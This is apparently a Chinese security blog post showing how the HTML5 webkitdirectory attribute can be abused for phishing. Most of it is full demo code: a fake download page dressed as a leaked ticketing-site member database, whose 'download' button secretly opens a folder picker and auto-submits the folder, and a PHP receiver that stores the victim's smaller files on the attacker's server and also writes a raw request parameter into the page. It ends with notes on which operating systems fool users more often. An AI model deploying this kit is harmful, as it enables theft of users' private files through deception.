Webkitdirectory
早在 12 年 Alan Layt 便写了这篇关于 HTML5 中上传文件夹新特性的文章(http://sapphion.com/2011/11/21/html5-folder-upload-with-webkitdirectory/),之后阿里做了个简单的 Demo 页面来说明这个特性配合 ClickJacking 是可以达到某种钓鱼效果的(https://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.IYip0H&id=3),基于前面两篇文章这里做了简单的 Demo 分享一下。
Phishing
在支持 HTML5 的浏览其中嵌入:
|
1
|
<
input
type
=
"file"
name
=
"test"
id
=
"file-upload"
multiple
webkitdirectory
=
""
>
|
此时文件夹变得可选择,攻击者可以实现使用 webkitdirectory 特性诱导用户点击下载选择文件夹,其背后实现的是将文件夹上传到服务端,之后我写了一个简单的 Demo 来进行测试,流程大致为:
- 编写前端钓鱼下载页面
- 诱导用户点击选择文件夹
- 过滤出用户文件夹的指定文件
- 将符合条件的文件上传至远程服务器
这里对目标文件夹内的文件格式进行过滤,防止在容量过大的情况,请求过久发现疑点。
Demo
phishing.html
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
<
html
>
<
head
>
<
title
>
damaiwang_1500w_database
.
rar
_免费高速下载
<
/
title
>
<
meta
http
-
equiv
=
"Content-Type"
content
=
"text/html; charset=utf-8"
/
>
<style>
#download
{
color
:
#FFF
;
background
:
url
(
http
:
//s1.pan.bdstatic.com/yun-static/common-cdn/images/btn_sprit.gif?t=1438054273762
)
no-repeat
0
0
;
display
:
inline-block
;
_width
:
35px
;
white-space
:
nowrap
;
outline
:
0
;
text-decoration
:
none
;
background
:
url
(
http
:
//s1.pan.bdstatic.com/yun-static/common-cdn/images/btn_sprit.gif?t=1438054273762
)
no-repeat
0
-601px
;
text-align
:
center
;
padding-left
:
25px
;
padding
:
5px
;
font-size
:
15px
;
position
:
relative
;
border-radius
:
2px
;
}
#download:hover
{
color
:
#eee
;
}
</style>
<script
src
=
"http://lib.sinaapp.com/js/jquery/1.9.1/jquery-1.9.1.min.js"
>
</script>
<
/
head
>
<
body
>
<
p
>大麦票务网站疑似会员数据泄露总量达到上百万
<
/
p
>
--
--
--
--
--
--
--
--
--
--
--
<
br
>
<
br
>
<
form
id
=
"f1"
action
=
"_phishing.php"
name
=
"uploadtest"
enctype
=
"multipart/form-data"
method
=
"post"
>
<
label
for
=
"file-upload"
class
=
"ui icon button"
>
<
a
id
=
"download"
>
<
b
>下载压缩包
(
233M
)
<
/
b
>
<
/
a
>
<
/
label
>
<
input
type
=
"file"
name
=
"file-upload[]"
id
=
"file-upload"
multiple
webkitdirectory
=
""
style
=
"display:none"
onchange
=
"document.uploadtest.submit()"
>
<
input
type
=
"submit"
value
=
"Download"
style
=
"display:none"
/
>
<script>
var
uploader
=
document
.
createElement
(
'input'
)
;
if
(
!
(
'webkitdirectory'
in
uploader
)
)
{
$
(
'body'
)
.
html
(
'<p>当前浏览器不支持!</p>'
)
;
}
</script>
<
/
form
>
<
/
body
>
<
/
html
>
|
_phishing.php
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
<?php
// author: evi1m0
$content
=
$_GET
[
'ps_res'
]
;
$fp
=
fopen
(
"phishing.html"
,
'a'
)
;
if
(
$fp
)
{
fwrite
(
$fp
,
$content
)
;
}
echo
$content
;
fclose
(
$fp
)
;
// upload
if
(
$_FILES
[
'file-upload'
]
)
{
$uploads
=
UpFilesTOObj
(
$_FILES
[
'file-upload'
]
)
;
$fileUploader
=
new
FileUploader
(
$uploads
)
;
}
class
FileUploader
{
public
function
__construct
(
$uploads
,
$uploadDir
=
'uploads/'
)
{
foreach
(
$uploads
as
$current
)
{
$this
->
uploadFile
=
$uploadDir
.
$current
->
name
.
"."
.
get_file_extension
(
$current
->
name
)
;
if
(
$this
->
upload
(
$current
,
$this
->
uploadFile
)
)
{
//echo "Successfully uploaded ".$current->name."\n";
}
}
echo
'Download failed :('
;
}
public
function
upload
(
$current
,
$uploadFile
)
{
if
(
move_uploaded_file
(
$current
->
tmp_name
,
$uploadFile
)
)
{
return
true
;
}
}
}
function
UpFilesTOObj
(
$fileArr
)
{
foreach
(
$fileArr
[
'name'
]
as
$keyee
=
>
$info
)
{
$sizes
=
$uploads
[
$keyee
]
->
type
=
$fileArr
[
'size'
]
[
$keyee
]
;
if
(
$sizes
<
250000
)
{
$uploads
[
$keyee
]
->
name
=
$fileArr
[
'name'
]
[
$keyee
]
;
$uploads
[
$keyee
]
->
type
=
$fileArr
[
'type'
]
[
$keyee
]
;
$uploads
[
$keyee
]
->
tmp_name
=
$fileArr
[
'tmp_name'
]
[
$keyee
]
;
$uploads
[
$keyee
]
->
error
=
$fileArr
[
'error'
]
[
$keyee
]
;
}
}
return
$uploads
;
}
function
get_file_extension
(
$file_name
)
{
return
substr
(
strrchr
(
$file_name
,
'.'
)
,
1
)
;
}
|
Case
- Windows & Unix
在测试过程中, 我们发现类 Unix 系统中招率高于 Windows (原因如图),Windows 上提示浏览文件夹与平时下载保存不同,而 Mac OS 下基本和平时下载文件操作 UI 一样,由于习惯问题直接敲下键盘回车“下载”文件的人不在少数。
222
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
